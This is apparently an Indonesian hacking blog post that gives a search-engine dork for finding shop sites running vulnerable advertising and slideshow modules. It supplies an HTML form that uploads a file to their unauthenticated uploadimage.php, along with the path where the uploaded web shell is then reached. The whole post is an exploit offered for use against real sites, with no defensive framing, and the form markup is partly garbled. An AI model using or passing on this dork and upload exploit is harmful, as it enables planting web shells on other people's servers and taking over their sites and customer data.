people_hurt
Dork :
- inurl:/modules/columnadverts/
- Kembangin lagi ya :D
Jika Vuln akan seperti ini :
- /modules/columnadverts/uploadimage.php
- /modules/homepageadvertise/uploadimage.php
- /modules/productpageadverts/uploadimage.php
- /modules/simpleslideshow/uploadimage.php
- dan lain"
Exploit :
<form method="POST" action="TARGET/modules/module name/uploadimage.php"Respon : success:shell.xxx
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>
DISINI
Shell Access :
TARGET/modules/modul name/slides/shell.xxx
Tidak ada komentar:
Posting Komentar